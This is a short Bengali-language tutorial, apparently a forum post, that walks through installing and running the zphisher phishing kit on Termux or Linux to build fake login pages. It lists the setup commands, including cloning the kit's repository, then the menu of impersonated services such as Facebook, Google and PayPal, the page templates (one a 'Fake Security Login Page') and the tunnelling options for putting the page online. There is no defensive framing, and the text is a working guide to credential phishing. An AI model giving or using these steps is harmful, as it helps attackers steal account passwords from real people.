ফেক লগইন পেইজ বানাতে এই প্যাকেজ install করতে হবে আগে । linux/termux..

pkg update && pkg upgrade -y                          
pkg install git -y
pkg install php -y
pkg install curl -y
pkg install wget -y
pkg install openssh -y
pkg install python -y
git clone https://github.com/htr-tech/zphisher.git
cd zphisher
bash zphisher.sh

আবার পরের বার চালু করতে এই কমান্ত টা । 

cd zphisher
bash zphisher.sh

চালানোর নিয়ম দেওয়া হলও ।

এই গুলার মধ্যে যেটা ইছা বানাউ ।
যেটা বানাবা ওটাই কত নাম্বার আছে ওটা দাউ যেমন (Facebook) { > 1 < ] হবে 

[01] Facebook      [11] Twitch       [21] DeviantArt                                                                                                                
[02] Instagram     [12] Pinterest    [22] Badoo                                                                                                                     
[03] Google        [13] Snapchat     [23] Origin                                                                                                                    
[04] Microsoft     [14] Linkedin     [24] DropBox                                                                                                                   
[05] Netflix       [15] Ebay         [25] Yahoo                                                                                                                     
[06] Paypal        [16] Quora        [26] Wordpress                                                                                                                 
[07] Steam         [17] Protonmail   [27] Yandex                                                                                                                    
[08] Twitter       [18] Spotify      [28] StackoverFlow                                                                                                             
[09] Playstation   [19] Reddit       [29] Vk                                                                                                                        
[10] Tiktok        [20] Adobe        [30] XBOX                                                                                                                      
[31] Mediafire     [32] Gitlab       [33] Github                                                                                                                    
[34] Discord       [35] Roblox                                                                                                                                      
                                                                                                                                                                    
[99] About         [00] Exit 

তার পরে এটা দেকতে পাবা । এর মধ্যে ১ নাম্বের টা ভালো কাজ করে 

[01] Traditional Login Page                                                                                                                                         
[02] Advanced Voting Poll Login Page                                                                                                                                
[03] Fake Security Login Page                                                                                                                                       
[04] Facebook Messenger Login Page

তার পরে পাবা এটা আর মধ্যে যেটা ইছা দাউ ১-২-৩ যেটা ইছা । 
 [01]Localhost                                                                                                                                                      
[02] Cloudflared  [Auto Detects]                                                                                                                                    
[03] LocalXpose   [NEW! Max 15Min] 
